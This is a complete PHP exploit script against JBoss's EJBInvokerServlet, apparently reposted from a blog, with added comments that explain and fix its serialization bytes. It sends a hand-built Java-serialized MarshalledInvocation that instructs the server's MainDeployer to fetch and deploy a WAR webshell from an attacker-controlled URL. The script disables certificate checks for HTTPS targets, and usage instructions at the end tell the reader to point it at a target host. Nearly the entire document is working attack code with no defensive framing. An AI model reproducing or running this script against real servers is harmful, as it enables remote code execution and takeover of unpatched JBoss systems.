• JBoss invoker getshell (PHP version): POSTs a pre-built Java-serialized MarshalledInvocation to /invoker/EJBInvokerServlet/ that asks the jboss.system:service=MainDeployer MBean to deploy a WAR fetched from an attacker-controlled URL.


    <?php
    
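    $target = isset($argv[1]) ? $argv[1] : '';
    $procotol = isset($argv[2]) ? $argv[2] : '';
    
    // Two positional arguments are required ($argv[2] is consumed as the
    // protocol selector further down), so fewer than "script target protocol"
    // is a usage error. The original test ($argc < 2) let a missing second
    // argument fall through to a less helpful failure later on.
    if ($argc < 3) {
    	print "[-]:php Jboss.php https://targets:443 http/https \n";
    	exit(1);
    }
    
    // URL the target's MainDeployer will be told to fetch and deploy. Edit
    // before use. Keep it at most 41 bytes: the serialized value that embeds
    // it (206 fixed bytes + URL) is written behind a one-byte block-data
    // length together with 8 bytes of framing, and a longer URL yields a
    // malformed stream rather than a visible error.
    $url="http://xx.xx.xx.xx/shell.war"; 
    
    // Two-byte big-endian length prefix, the writeUTF() framing the stream
    // expects in front of the URL bytes.
    $url_len=pack("n",strlen($url));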
    
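    /**
     * Print a classic hex dump of $data to stdout: a 6-wide hex offset, the
     * next 16 bytes as space-separated hex pairs, and the same bytes as ASCII
     * with anything outside 0x20-0x7E replaced by '.'.
     *
     * Not called by the script itself; kept as a debugging aid for inspecting
     * the serialized payload before it is sent.
     *
     * @param string $data    raw bytes to dump
     * @param string $newline terminator echoed after every row
     * @return void
     */
    function hex_dump($data, $newline = "\n") { 
    static $from = '';   
    static $to = '';    
    static $width = 16; static $pad = '.';  
     // Build the 256-entry byte -> printable translation table once.
     if ($from==='')   {     
         for ($i=0; $i<=0xFF; $i++)  { 
             $from .= chr($i);       
             $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;   
         }   
     }    
     // Empty input: print nothing. Without this, PHP < 8.2 (where
     // str_split('') returns ['']) emitted a bogus "     0 :  []" row.
     if ($data === null || $data === '') {
         return;
     }
    $hex = str_split(bin2hex($data), $width*2);   
    $chars = str_split(strtr($data, $from, $to), $width);    
    $offset = 0;   
    foreach ($hex as $i => $line)   {     
        echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;    
       $offset += $width;   
      } 
    } 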
    
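    // Head of the outer serialization stream (magic 0xACED, version 5):
    // class descriptors for org.jboss.invocation.MarshalledInvocation, a
    // java.lang.Integer (extends java.lang.Number) and
    // org.jboss.invocation.MarshalledValue. It ends on a 0x77 TC_BLOCKDATA tag
    // whose one-byte length is supplied when $data is assembled.
    // The "\x" escapes were lost when the listing was rendered; restored here.
    $frag_i=
    "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". // ....sr.) org.jbos
    "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". // s.invoca tion.Mar
    "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". // shalledI nvocatio
    "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". // n...'A>. ....xppw
    "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". // .x..G..S .sr..jav
    "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". // a.lang.I nteger..
    "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". // .....8.. .I..valu
    "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". // exr..jav a.lang.N
    "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". // umber... ........
    "\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". // xp&...sr .$org.jb
    "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". // oss.invo cation.M
    "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". // arshalle dValue..
    "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77";                 // .....J.. ..xpw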
    
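    // Single zero byte placed between the block-data length and the nested
    // value length when $data is assembled ("\x" escape restored).
    $frag_ii="\x00";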
    
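    // Inner serialization stream carried inside the MarshalledValue: an
    // Object[] of four elements -- the javax.management.ObjectName
    // "jboss.system:service=MainDeployer", the operation name "deploy", an
    // Object[] holding the length-prefixed $url, and a String[] signature of
    // "java.lang.String". 206 fixed bytes plus the URL.
    // The "\x" escapes were lost when the listing was rendered; restored here.
    $frag_iii=
    "\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e".     // .....ur. .[Ljava.
    "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". // lang.Obj ect;..X.
    "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". // .s)l...x p....sr.
    "\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". // .javax.m anagemen
    "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". // t.Object Name....
    "\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". // .m.....x pt.!jbos
    "\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". // s.system :service
    "\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". // =MainDep loyerxt.
    "\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". // .deployu q.~.....
    "\x01\x74".                                                         // .t  (TC_STRING)
    $url_len.                                                           // 2-byte BE length
    $url.                                                               // URL bytes
    "\x75\x72\x00".                                                     // ur.
    "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61".                         // .[Ljava.la
    "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". // ng.Strin g;..V...
    "\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". // {G...xp. ...t..ja
    "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67";         // va.lang.String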
    
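    // Tail of the outer stream. The first four bytes are a fixed value that
    // presumably is the MarshalledValue's stored hash; it is NOT recomputed
    // when $url changes -- confirm the server never validates it before
    // relying on this. What follows encodes the invocation map:
    // org.jboss.invocation.InvocationKey / InvocationType entries and a
    // JMX_OBJECT_NAME of "jboss.system:service=MainDeployer".
    // The "\x" escapes were lost when the listing was rendered; restored here.
    $frag_iv=
    "\x0d\xd3". 
    "\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". // ..xw.... .sr."org
    "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". // .jboss.i nvocatio
    "\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". // n.Invoca tionKey.
    "\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". // .r...... ..I..ord
    "\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". // inalxp.. ..sq.~..
    "\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". // w....... ..p.W..x
    "\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". // w.....sq .~......
    "\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". // sr.#org. jboss.in
    "\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". // vocation .Invocat
    "\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". // ionTypeY .:..+|..
    "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". // ..I..ord inalxp..
    "\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". // ..sq.~.. ....pt..
    "\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". // JMX_OBJE CT_NAMEs
    "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". // r..javax .managem
    "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". // ent.Obje ctName..
    "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". // ...m.... .xpt.!jb
    "\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". // oss.syst em:servi
    "\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". // ce=MainD eployerx
    "\x78";                                                             // x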
    
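    // Assemble the request body. $frag_i ends on a 0x77 TC_BLOCKDATA tag whose
    // length is ONE byte: pack("v") emits the low byte of strlen($frag_iii)+8
    // as that length, and its high byte plus $frag_ii plus pack("n") then form
    // the 4-byte length written in front of the nested value bytes (review:
    // inferred from the byte layout; confirm against MarshalledValue's
    // writeExternal). That framing is only correct while the count fits in a
    // byte, so refuse to build a silently corrupt payload when $url is long.
    $frag_iii_len = strlen($frag_iii);
    if ($frag_iii_len + 8 > 0xFF) {
    	print "[-]:deploy URL too long, serialized value must stay <= 247 bytes\n";
    	exit(1);
    }
    $data=$frag_i.pack("v",$frag_iii_len+8).$frag_ii.pack("n",$frag_iii_len).$frag_iii.$frag_iv;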
    
    
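    /**
     * POST $data to $url with curl and describe the outcome in one line.
     *
     * Shared body of vpost()/tpost(): the two wrappers differ only in whether
     * TLS certificate checks are disabled and in the word used in the message.
     * The response body is fetched but not inspected; only transport-level
     * failures and the HTTP status code are reported.
     *
     * @param string $url            full URL of the invoker servlet
     * @param string $data           raw serialized bytes to send as the body
     * @param bool   $skipTlsVerify  disable peer and host certificate checks
     * @param string $label          "http" or "https", used only in the message
     * @return string "Curl <label> connect suscess (HTTP <code>)\n" on success,
     *                "Curl <label> connect Error: <curl message>\n" otherwise
     */
    function jboss_post($url, $data, $skipTlsVerify, $label){
    	$curl = curl_init(); 
    	curl_setopt($curl, CURLOPT_URL, $url);
    	if ($skipTlsVerify) {
    		// Lab / self-signed targets: switch off both checks. 0 is the
    		// documented "off" value for VERIFYHOST; the original 1 is rejected
    		// by newer libcurl, which leaves host verification at its default.
    		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); 
    		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    	}
    	curl_setopt($curl, CURLOPT_USERAGENT,'java'); 
    	// NOTE: libcurl re-issues 301/302/303 redirects as GET by default, so a
    	// redirected POST silently loses $data.
    	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
    	curl_setopt($curl, CURLOPT_AUTOREFERER, 1); 
    	curl_setopt($curl, CURLOPT_POST, 1); 
    	curl_setopt($curl, CURLOPT_POSTFIELDS, $data); 
    	curl_setopt($curl, CURLOPT_TIMEOUT, 30); 
    	curl_setopt($curl, CURLOPT_HEADER, 0); 
    	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
    	curl_exec($curl);
    	$errno = curl_errno($curl);
    	$error = curl_error($curl);
    	$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    	curl_close($curl); 
    	// The original echoed an error and *still* returned the success line;
    	// report one outcome only, and include the status so a 200 can be told
    	// from a 500 without re-running.
    	if ($errno !== 0) {
    		return "Curl {$label} connect Error: {$error}\n";
    	}
    	return "Curl {$label} connect suscess (HTTP {$status})\n"; 
    }
    
    /** HTTPS variant: certificate verification disabled. */
    function vpost($url,$data){
    	return jboss_post($url, $data, true, 'https');
    }
    
    /** Plain-HTTP variant: libcurl defaults, no TLS options touched. */
    function tpost($url,$data){
    	return jboss_post($url, $data, false, 'http');
    }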
    
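    // The protocol word only selects the sender: "https" goes through vpost()
    // (certificate checks off), "http" through tpost(). $target must already
    // carry its own scheme and port; the servlet path is appended here.
    $endpoint = $target."/invoker/EJBInvokerServlet/";
    if($procotol == "https")
    {
    	echo vpost($endpoint, $data);
    }else if ($procotol == "http")
    {
    	echo tpost($endpoint, $data);
    }else
    {
    	// A bad or missing protocol word is a usage error: exit non-zero like
    	// the argument-count check does (the original exited 0 here).
    	print "your not enter data\n";
    	exit(1);
    }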
    
    
    ?>
    

      

    Usage: `php jboss.php https://www.xx.com:443 https` — the first argument is the target base URL including scheme and port (the script appends `/invoker/EJBInvokerServlet/`); the second must be `http` or `https` and only decides whether TLS certificate verification is switched off for the request. The deploy URL is hard-coded in `$url` and must be edited before use.

  • 原文地址:https://www.cnblogs.com/killbit/p/4357216.html
Copyright © 2020-2023  润新知